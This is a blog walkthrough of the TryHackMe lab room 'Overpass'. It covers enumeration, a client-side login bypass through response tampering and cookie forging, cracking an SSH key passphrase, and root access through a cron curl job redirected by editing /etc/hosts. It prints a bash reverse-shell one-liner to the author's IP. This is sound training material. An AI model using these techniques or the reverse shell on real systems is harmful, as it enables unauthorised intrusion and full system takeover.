Writeup TryHackMe — Overpass | Walkthrough

Jai Gupta
5 min readJul 24, 2020

Walkthrough of Overpass — Tryhackme

Overpass — Tryhackme Walkthrough

Here is a walkthrough of the TryHackMe room “Overpass.” If you haven’t already completed the challenge, you can do so here.

Hello, today we are going to solve an exciting room Overpass, which is quite different for me than other rooms. It is worth solving this room as it contains an important OWASP Top 10 vulnerability, i.e Broken Authentication.

Enumeration

Nmap

nmap scan result

As always starting with a nmap scan. Only two ports — 22 and 80 are open with SSH and HTTP, rest are filtered. Initially we have no clue on SSH so moving to Enumerate HTTP. Also did nikto scan till then but got nothing interesting.

nikto scan result

Moving to the main website:-

Main HTTP page

This hosts a webpage with some information about overpass password manager. There are only two pages linked with homepage which doesn’t seems interesting, so moving to directory scanning:

Dirsearch Scan

Dirsearch Scan

Directory scanning showed many pages but /admin/ seems interesting.

Logging In via Broken Authentication

Now no clue on credentials, also brute-forcing is not the solution as mentioned in the hint.

By going through the files associated with the source code shows us an exciting file named login.js containing the function used in the login form on the /admin page.

The function login() in the box is the vulnerable code that will let us bypass the login form. The variable creds take the credentials, and variable response sends them to /api/login for validation, and the statusOrCookie variable takes the response. Till here, everything seems perfect now in the Conditional statement; it checks if the response from the server is “Incorrect Credentials” then it will not allow access otherwise, it will set a cookie named “SessionToken” to statusOrCookie and redirect us to the admin panel. Here lies the vulnerability as a user can change the response of /api/login from “Incorrect Credentials” to anything else using Burp and trick the server to run the else part of the code. Lets do it:-
Intercepting request using burp:

Burp Intercept Request

Now, as we want to change the response, not the request so choosing Action > Do intercept > Response to the request.

Forwarding the request to get the response:

We get the response as expected now change it to anything else or delete “Incorrect Credentials” and again forward the request. Now refresh the page to get access.

Wow! we got access to the page without the credentials.

BONUS

There is an alternate method to login as the login.js is creating a cookie in case of successfully logging in. We can manually create the cookie on the login page named “SessionToken” and assign it any value as there is no code to validate our cookie.

Refresh the page to successfully logging in:

Now moving to page provides majorly 2 things:

1.There is a user name james.
2.The ssh key to login via SSH.

Saving the Key to a file and reduce its permission using chmod 400 james.key and then connecting via SSH:

Logging in Via SSH

Ohh!! It is asking for the passphrase for the provided key. As no passphrase is found so brute-forcing is the only option. using ssh2john.py to convert to hash that john can crack using rockyou.txt

It successfully found the passphrase. Now we can log in via SSH.

Get the user flag and submit.

Privilege Escalation

This part is really interesting as none of the manual methods worked.

1.Can't run sudo -l as don't know james password.
2.SUID bit can be cheched by "find / -user root -perm -4000 -exec ls -ldb {} \; 2> /dev/null " but are also not intersting.

Using automated tools like linpeas.sh initially not helped until I saw the room tag mentioned “cron”.

User root is connecting to a URL using curl, moving down to check more to results of linpeas shows writable access to file /etc/hosts which is usually only writable by root.

Since curl is used by root so if we somehow exploit it, we can get the root access. The curl command from cronjob is using a “overpass.thm” as the hostname and we have write access to the hosts file. Therefore we can replace the hostname to make the cronjob think that the hostname is from our IP Address which will let it connect to our given IP address. Let us do this practically:

1. We need to start a python server locally using "python3 -m http.server 80" choose port 80 as it is the default port.
2. Make the same directory as "/downloads/src/buildscript.sh"
3. Finally a file named buildscript.sh with the reverse shell, I used it from pentestermonkey.net "bash -i >& /dev/tcp/10.9.19.190/1234 0>&1"
4.Now start a netcat listener locally to which the Box will connect.
5. At last replace the IP of the /etc/hosts of overpass.thm to our own connecting IP.
6. All done now wait a few seconds till it connects back to us via nc listener due to cronjob assigned.

Finally, we got a connection from the Box as root.

Originally published at Overpass Walkthrough Blog on July 24, 2020.

--

--

Jai Gupta

Build & Break | OSCP | Red Teaming | Penetration Testing